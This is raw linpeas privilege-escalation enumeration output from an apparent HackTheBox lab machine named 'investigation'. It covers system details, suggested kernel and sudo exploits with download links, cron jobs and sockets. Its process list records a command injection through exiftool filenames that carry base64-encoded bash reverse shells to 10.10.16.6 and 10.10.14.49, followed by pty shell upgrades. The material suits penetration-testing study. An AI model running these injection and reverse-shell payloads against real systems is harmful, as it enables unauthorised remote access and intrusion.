Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist                                                         
 LEGEND:                                                                         
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════                                                                               
                               ╚═══════════════════╝                             
OS: Linux version 5.4.0-137-generic (buildd@lcy02-amd64-009) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: investigation
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)                                                             
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)                                                                            
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)                                
                                                                                 
                                                                                 

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE                                                        
                                                                                 
                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════                                                                                
                              ╚════════════════════╝                             
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits                                                                                
Linux version 5.4.0-137-generic (buildd@lcy02-amd64-009) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023
Distributor ID: Ubuntu
Description:    Ubuntu 20.04.5 LTS
Release:        20.04
Codename:       focal

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version  
Sudo version 1.8.31                                                              

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560                                                      

Potentially Vulnerable to CVE-2022-2588



╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                                                           
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin                     
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Date & uptime
Sat Feb  4 18:13:21 UTC 2023                                                     
 18:13:21 up 11:07,  0 users,  load average: 0.15, 0.03, 0.01

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                                             
sda
sda1
sda2
sda3

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices                                        
/dev/disk/by-id/dm-uuid-LVM-QZpY6BDSc8PHT65ifFCPhlbz0j3A8jDxED0StqN95nQDWGKcFMUx1TInm4OppjjK / ext4 defaults 0 1                                                  
/dev/disk/by-uuid/0971f5de-423c-43da-b91c-6c6070a15bc9 /boot ext4 defaults 0 1
/dev/mapper/ubuntu--vg-swap     none    swap    sw      0       0

╔══════════╣ Environment
╚ Any private information inside environment variables?                          
HISTFILESIZE=0                                                                   
USER=www-data
SHLVL=3
HOME=/var/www
OLDPWD=/
LC_CTYPE=C.UTF-8
_=./linpeas.sh
TERM=xterm
HISTSIZE=0
PWD=/tmp
HISTFILE=/dev/null

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed                                                            
dmesg Not Found                                                                  
                                                                                 
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                               
cat: write error: Broken pipe                                                    
cat: write error: Broken pipe
[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2                          
                                                                                 
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found                                
═╣ Execshield enabled? ............ Execshield Not Found                         
═╣ SELinux enabled? ............... sestatus Not Found                           
═╣ Seccomp enabled? ............... disabled                                     
═╣ AppArmor profile? .............. unconfined
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)                                 

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════                                                                               
                                   ╚═══════════╝                                 
╔══════════╣ Container related tools present
╔══════════╣ Am I Containered?                                                   
╔══════════╣ Container details                                                   
═╣ Is this a container? ........... No                                           
═╣ Any running containers? ........ No                                           
                                                                                 

                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════                                                                               
                                     ╚═══════╝                                   
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS Lambda? .......................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                                                                                
                ╚════════════════════════════════════════════════╝               
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes                                       
root           1  0.0  0.2 169904 11224 ?        Ss   07:06   0:05 /sbin/init maybe-ubiquity
root         522  0.0  0.1  22496  5912 ?        Ss   07:06   0:01 /lib/systemd/systemd-udevd
systemd+     527  0.0  0.1  19064  7568 ?        Ss   07:06   0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw                                                                    
root         669  0.0  0.4 214600 17948 ?        SLsl 07:06   0:04 /sbin/multipathd -d -s
systemd+     700  0.0  0.1  90876  6188 ?        Ssl  07:06   0:04 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
root         702  0.0  0.0  11356  1616 ?        S<sl 07:06   0:01 /sbin/auditd
root         719  0.0  0.2  47532 10772 ?        Ss   07:06   0:00 /usr/bin/VGAuthService                                                                         
root         740  0.1  0.2 237772  8304 ?        Ssl  07:06   0:53 /usr/bin/vmtoolsd                                                                              
root         741  0.0  0.1  99896  5712 ?        Ssl  07:06   0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root         768  0.0  0.2 239292  9352 ?        Ssl  07:06   0:01 /usr/lib/accountsservice/accounts-daemon
message+     769  0.0  0.1   7656  4792 ?        Ss   07:06   0:01 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root         777  0.0  0.0  81956  3772 ?        Ssl  07:06   0:02 /usr/sbin/irqbalance --foreground
root         778  0.0  0.4  29664 18528 ?        Ss   07:06   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         779  0.0  0.2 236436  9088 ?        Ssl  07:06   0:00 /usr/lib/policykit-1/polkitd --no-debug
root         780  0.0  0.1  17520  7956 ?        Ss   07:06   0:00 /lib/systemd/systemd-logind
root         786  0.0  0.3 395516 13576 ?        Ssl  07:06   0:00 /usr/lib/udisks2/udisksd
root         818  0.0  0.3 318816 13328 ?        Ssl  07:06   0:00 /usr/sbin/ModemManager
systemd+     912  0.0  0.3  24436 12096 ?        Ss   07:06   0:05 /lib/systemd/systemd-resolved
root         960  0.0  0.0   6816  2948 ?        Ss   07:06   0:00 /usr/sbin/cron -f
root         963  0.0  0.8 235904 35840 ?        Ss   07:06   0:04 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
www-data    1038  0.0  0.4 236368 19300 ?        S    07:06   0:00  _ php-fpm: pool www
www-data   19216  0.0  0.0   2608   592 ?        S    17:45   0:00  |   _ sh -c cd /var/www/uploads/1675532747 && /opt/exiftool/exiftool * > /var/www/html/analysed_images/echoYmFzaCAtaSAJiAvZGV2L3RjcC8xMC4xMC4xNi42LzE0ODggMD4mMQbase64dbash.txt
www-data   19217  0.0  0.4  20148 17580 ?        S    17:45   0:00  |       _ /usr/bin/perl -w /opt/exiftool/exiftool echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzE0ODggMD4mMQ=='|base64 -d|bash|
www-data   19218  0.0  0.0   2608   600 ?        S    17:45   0:00  |           _ sh -c echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzE0ODggMD4mMQ=='|base64 -d|bash
www-data   19221  0.0  0.0   3976  2940 ?        S    17:45   0:00  |               _ bash
www-data   19222  0.0  0.0   4240  3544 ?        S    17:45   0:00  |                   _ bash -i
www-data    1039  0.0  0.4 236368 17140 ?        S    07:06   0:00  _ php-fpm: pool www
www-data    2939  0.0  0.0   2608   596 ?        S    14:26   0:00  |   _ sh -c cd /var/www/uploads/1675520781 && /opt/exiftool/exiftool * > /var/www/html/analysed_images/ping10101420.txt                                                        
www-data    2940  0.0  0.4  21172 18640 ?        S    14:26   0:00  |       _ /usr/bin/perl -w /opt/exiftool/exiftool ping 10.10.14.20|
www-data    2941  0.0  0.0   4124   924 ?        S    14:26   0:02  |           _ ping 10.10.14.20
www-data    3007  0.0  0.4 236368 17276 ?        S    14:32   0:00  _ php-fpm: pool www
www-data   48299  0.0  0.0   2608   596 ?        S    17:56   0:00  |   _ sh -c cd /var/www/uploads/1675533364 && /opt/exiftool/exiftool * > /var/www/html/analysed_images/echoYmFzaCAtaSAJiAvZGV2L3RjcC8xMC4xMC4xNC40OS80NDQ0IDAJjEKbase64dbash.txt
www-data   48300  0.0  0.4  20144 17680 ?        S    17:56   0:00  |       _ /usr/bin/perl -w /opt/exiftool/exiftool echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40OS80NDQ0IDA+JjEK'|base64 -d|bash|
www-data   48301  0.0  0.0   2608   600 ?        S    17:56   0:00  |           _ sh -c echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40OS80NDQ0IDA+JjEK'|base64 -d|bash
www-data   48304  0.0  0.0   3976  2896 ?        S    17:56   0:00  |               _ bash
www-data   48305  0.0  0.0   4108  3604 ?        S    17:56   0:00  |                   _ bash -i
www-data   48308  0.0  0.2  15956  9432 ?        S    17:56   0:00  |                       _ python3 -c import pty; pty.spawn("/bin/bash")
www-data   48309  0.0  0.0   7304  3660 pts/0    Ss+  17:56   0:00  |                           _ /bin/bash
www-data    3441  0.0  0.4 236368 17156 ?        S    14:48   0:00  _ php-fpm: pool www
www-data    4655  0.0  0.0   2608   596 ?        S    17:19   0:00  |   _ sh -c cd /var/www/uploads/1675531166 && /opt/exiftool/exiftool * > /var/www/html/analysed_images/echoYmFzaCAtaSAJiAvZGV2L3RjcC8xMC4xMC4xNi42LzE0ODggMD4mMQbase64dbash.txt
www-data    4656  0.0  0.4  20152 17716 ?        S    17:19   0:00  |       _ /usr/bin/perl -w /opt/exiftool/exiftool echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzE0ODggMD4mMQ=='|base64 -d|bash|
www-data    4657  0.0  0.0   2608   596 ?        S    17:19   0:00  |           _ sh -c echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzE0ODggMD4mMQ=='|base64 -d|bash
www-data    4660  0.0  0.0   3976  2900 ?        S    17:19   0:00  |               _ bash
www-data    4661  0.0  0.0   4236  3516 ?        S    17:19   0:00  |                   _ bash -i
www-data   19211  0.0  0.0   2516   580 ?        S    17:44   0:00  |                       _ cat f
www-data   33195  0.0  0.4 236368 17156 ?        S    17:49   0:00  _ php-fpm: pool www
www-data   48335  0.0  0.0   2608   592 ?        S    18:03   0:00      _ sh -c cd /var/www/uploads/1675533805 && /opt/exiftool/exiftool * > /var/www/html/analysed_images/echoYmFzaCAtaSAJiAvZGV2L3RjcC8xMC4xMC4xNC40OS80NDQ0IDAJjEKbase64dbash.txt
www-data   48336  0.0  0.4  20148 17724 ?        S    18:03   0:00          _ /usr/bin/perl -w /opt/exiftool/exiftool echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40OS80NDQ0IDA+JjEK|base64 -d|bash|
www-data   48337  0.0  0.0   2608   596 ?        S    18:03   0:00              _ sh -c echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40OS80NDQ0IDA+JjEK|base64 -d|bash
www-data   48340  0.0  0.0   3976  2864 ?        S    18:03   0:00                  _ bash
www-data   48341  0.0  0.0   4108  3560 ?        S    18:03   0:00                      _ bash -i
www-data   48343  0.0  0.2  16084  9528 ?        S    18:03   0:00                          _ python3 -c import pty; pty.spawn("/bin/bash")
www-data   48344  0.0  0.0   7436  3792 pts/1    Ss   18:03   0:00                              _ /bin/bash
www-data   48464  0.2  0.0   3604  2648 pts/1    S+   18:13   0:00                                  _ /bin/sh ./linpeas.sh
www-data   51502  0.0  0.0   3604  1084 pts/1    S+   18:13   0:00                                      _ /bin/sh ./linpeas.sh
www-data   51506  0.0  0.0   9416  3524 pts/1    R+   18:13   0:00                                      |   _ ps fauxwww
www-data   51505  0.0  0.0   3604  1084 pts/1    S+   18:13   0:00                                      _ /bin/sh ./linpeas.sh
daemon[0m       968  0.0  0.0   3796  2164 ?        Ss   07:06   0:00 /usr/sbin/atd -f
root         980  0.0  0.0   5828  1828 tty1     Ss+  07:06   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root         981  0.0  0.1   6860  4800 ?        Ss   07:06   0:03 /usr/sbin/apache2 -k start                                                                     
www-data     982  0.0  0.2 1212400 8488 ?        Sl   07:06   0:00  _ /usr/sbin/apache2 -k start                                                                  
www-data     983  0.0  0.2 1212656 8724 ?        Sl   07:06   0:00  _ /usr/sbin/apache2 -k start                                                                  
root        3102  0.0  0.2 249504  9428 ?        Ssl  14:35   0:00 /usr/lib/upower/upowerd

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)                                                                     
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes     
                                                                                 
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information                                                                
COMMAND     PID  TID TASKCMD               USER   FD      TYPE             DEVICE SIZE/OFF   NODE NAME

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-fr                                                                                      om-process-memory                                                                                                                                                      
gdm-password Not Found                                                                                                                                                 
gnome-keyring-daemon Not Found                                                                                                                                         
lightdm Not Found                                                                                                                                                      
vsftpd Not Found                                                                                                                                                       
apache2 process found (dump creds from memory as root)                                                                                                                 
sshd: process found (dump creds from memory as root)

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron                                                                                      -jobs                                                                                                                                                                  
/usr/bin/crontab                                                                                                                                                       
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command

*/5 * * * * date >> /usr/local/investigation/analysed_log && echo "Clearing folders" >> /usr/local/investigation/analysed_log && rm -r /var/www/uploads/* && rm /var/www/html/analysed_images/*                                                                                                                                          
incrontab Not Found
-rw-r--r-- 1 root root    1042 Feb 13  2020 /etc/crontab                                                                                                               

/etc/cron.d:
total 24
drwxr-xr-x   2 root root 4096 Aug 27 21:28 .
drwxr-xr-x 107 root root 4096 Jan 16 09:14 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rw-r--r--   1 root root  201 Feb 14  2020 e2scrub_all
-rw-r--r--   1 root root  712 Mar 27  2020 php
-rw-r--r--   1 root root  191 Feb 23  2022 popularity-contest

/etc/cron.daily:
total 52
drwxr-xr-x   2 root root 4096 Jan  6 09:27 .
drwxr-xr-x 107 root root 4096 Jan 16 09:14 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  539 Feb 23  2021 apache2
-rwxr-xr-x   1 root root  376 Dec  4  2019 apport
-rwxr-xr-x   1 root root 1478 Apr  9  2020 apt-compat
-rwxr-xr-x   1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x   1 root root 1187 Sep  5  2019 dpkg
-rwxr-xr-x   1 root root  377 Jan 21  2019 logrotate
-rwxr-xr-x   1 root root 1123 Feb 25  2020 man-db
-rwxr-xr-x   1 root root 4574 Jul 18  2019 popularity-contest
-rwxr-xr-x   1 root root  214 May 14  2021 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Feb 23  2022 .
drwxr-xr-x 107 root root 4096 Jan 16 09:14 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x   2 root root 4096 Feb 23  2022 .
drwxr-xr-x 107 root root 4096 Jan 16 09:14 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x   2 root root 4096 Aug 27 21:25 .
drwxr-xr-x 107 root root 4096 Jan 16 09:14 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  813 Feb 25  2020 man-db
-rwxr-xr-x   1 root root  403 Aug  5  2021 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command

*/5 * * * * date >> /usr/local/investigation/analysed_log && echo "Clearing folders" >> /usr/local/investigation/analysed_log && rm -r /var/www/uploads/* && rm /var/www/html/analysed_images/*

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-r                                                                                      elative-paths                                                                                                                                                          
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin                                                                                                      

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services                                                                                            
/etc/systemd/system/multi-user.target.wants/atd.service is executing some relativ                                                                                      e path
/etc/systemd/system/multi-user.target.wants/grub-common.service is executing some relative path
/etc/systemd/system/sleep.target.wants/grub-common.service is executing some relative path
You can't write on systemd PATH

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                                                                                              
NEXT                        LEFT          LAST                        PASSED                                                                                             UNIT                         ACTIVATES                     
Sat 2023-02-04 18:39:00 UTC 24min left    Sat 2023-02-04 18:09:02 UTC 5min ago     phpsessionclean.timer        phpsessionclean.service       
Sat 2023-02-04 18:59:37 UTC 45min left    Sat 2023-02-04 14:35:45 UTC 3h 38min ago fwupd-refresh.timer          fwupd-refresh.service         
Sat 2023-02-04 20:07:56 UTC 1h 53min left Sat 2023-02-04 13:48:24 UTC 4h 25min ago ua-timer.timer               ua-timer.service              
Sat 2023-02-04 20:16:40 UTC 2h 2min left  Sat 2023-02-04 10:38:47 UTC 7h ago       apt-daily.timer              apt-daily.service             
Sat 2023-02-04 21:15:33 UTC 3h 1min left  Sat 2023-02-04 09:18:13 UTC 8h ago       motd-news.timer              motd-news.service             
Sun 2023-02-05 00:00:00 UTC 5h 45min left Sat 2023-02-04 07:06:27 UTC 11h ago      logrotate.timer              logrotate.service             
Sun 2023-02-05 00:00:00 UTC 5h 45min left Sat 2023-02-04 07:06:27 UTC 11h ago      man-db.timer                 man-db.service                
Sun 2023-02-05 03:10:20 UTC 8h left       Sat 2023-02-04 07:06:52 UTC 11h ago      e2scrub_all.timer            e2scrub_all.service           
Sun 2023-02-05 06:42:56 UTC 12h left      Sat 2023-02-04 07:24:12 UTC 10h ago      apt-daily-upgrade.timer      apt-daily-upgrade.service     
Sun 2023-02-05 07:21:16 UTC 13h left      Sat 2023-02-04 07:21:16 UTC 10h ago      systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2023-02-06 00:00:00 UTC 1 day 5h left Sat 2023-02-04 07:06:27 UTC 11h ago      fstrim.timer                 fstrim.service                

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                                                                                              
                                                                                                                                                                       
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets                                                                                             
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable li                                                                                      stener: /run/uuidd/request                                                                                                                                             
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket                                                                                                                                                  
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket                                                                                                                             
/usr/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request                                                                                                                                                              

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets                                                                                             
/org/kernel/linux/storage/multipathd                                                                                                                                   
/run/dbus/system_bus_socket
  └─(Read Write)
/run/irqbalance//irqbalance777.sock
  └─(Read )
/run/irqbalance/irqbalance777.sock
  └─(Read )
/run/lvm/lvmpolld.socket
/run/php/php7.4-fpm.sock
  └─(Read Write)
/run/systemd/fsck.progress
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write)
/run/udev/control
/run/uuidd/request
  └─(Read Write)
/run/vmware/guestServicePipe
  └─(Read Write)
/var/run/vmware/guestServicePipe
  └─(Read Write)

╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                                                                                               
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.                                                                                      conf (        <policy group="power">)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                                                                                               
NAME                            PID PROCESS         USER             CONNECTION                                                                                          UNIT                        SESSION DESCRIPTION
:1.0                            700 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service   -       -
:1.10                           912 systemd-resolve systemd-resolve  :1.10         systemd-resolved.service    -       -
:1.13                          3102 upowerd         root             :1.13         upower.service              -       -
:1.2                            527 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
:1.3                            768 accounts-daemon[0m root             :1.3          accounts-daemon.service     -       -
:1.4                            779 polkitd         root             :1.4          polkit.service              -       -
:1.49                         54892 busctl          www-data         :1.49         php7.4-fpm.service          -       -
:1.5                              1 systemd         root             :1.5          init.scope                  -       -
:1.6                            786 udisksd         root             :1.6          udisks2.service             -       -
:1.7                            818 ModemManager    root             :1.7          ModemManager.service        -       -
:1.8                            780 systemd-logind  root             :1.8          systemd-logind.service      -       -
:1.9                            778 networkd-dispat root             :1.9          networkd-dispatcher.service -       -
com.ubuntu.LanguageSelector       - -               -                (activatable) -                           -       -
com.ubuntu.SoftwareProperties     - -               -                (activatable) -                           -       -
org.freedesktop.Accounts        768 accounts-daemon[0m root             :1.3          accounts-daemon.service     -       -
org.freedesktop.DBus              1 systemd         root             -             init.scope                  -       -
org.freedesktop.ModemManager1   818 ModemManager    root             :1.7          ModemManager.service        -       -
org.freedesktop.PackageKit        - -               -                (activatable) -                           -       -
org.freedesktop.PolicyKit1      779 polkitd         root             :1.4          polkit.service              -       -
org.freedesktop.UDisks2         786 udisksd         root             :1.6          udisks2.service             -       -
org.freedesktop.UPower         3102 upowerd         root             :1.13         upower.service              -       -
org.freedesktop.bolt              - -               -                (activatable) -                           -       -
org.freedesktop.fwupd             - -               -                (activatable) -                           -       -
org.freedesktop.hostname1         - -               -                (activatable) -                           -       -
org.freedesktop.locale1           - -               -                (activatable) -                           -       -
org.freedesktop.login1          780 systemd-logind  root             :1.8          systemd-logind.service      -       -
org.freedesktop.network1        527 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
org.freedesktop.resolve1        912 systemd-resolve systemd-resolve  :1.10         systemd-resolved.service    -       -
org.freedesktop.systemd1          1 systemd         root             :1.5          init.scope                  -       -
org.freedesktop.thermald          - -               -                (activatable) -                           -       -
org.freedesktop.timedate1         - -               -                (activatable) -                           -       -
org.freedesktop.timesync1       700 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service   -       -


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠════════════════════════════                                                                                      ══                                                                                                                                                                     
                              ╚═════════════════════╝                                                                                                                  
╔══════════╣ Hostname, hosts and DNS
investigation                                                                                                                                                          
127.0.0.1 localhost investigation.htb
127.0.1.1 investigation 

::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

nameserver 127.0.0.53
options edns0 trust-ad

╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information                                                                                                    
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.197  netmask 255.255.254.0  broadcast 10.10.11.255
        ether 00:50:56:b9:1b:11  txqueuelen 1000  (Ethernet)
        RX packets 159708  bytes 13379768 (13.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 171679  bytes 16987335 (16.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 44485  bytes 3502159 (3.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 44485  bytes 3502159 (3.5 MB)
